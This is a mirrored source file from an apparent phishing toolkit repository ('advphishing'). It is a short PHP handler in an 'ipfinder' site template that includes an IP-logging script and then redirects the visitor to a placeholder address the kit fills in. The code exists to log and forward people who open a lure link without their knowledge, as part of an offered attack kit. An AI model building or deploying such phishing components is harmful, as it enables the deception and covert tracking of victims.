Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
ignitetch
GitHub Repository: ignitetch/advphishing
Path: blob/master/sites/ipfinder/post.php
738 views
1
<?php
2
include 'ip.php';
3
header('Location: https://$1');
4
exit
5
?>
6
7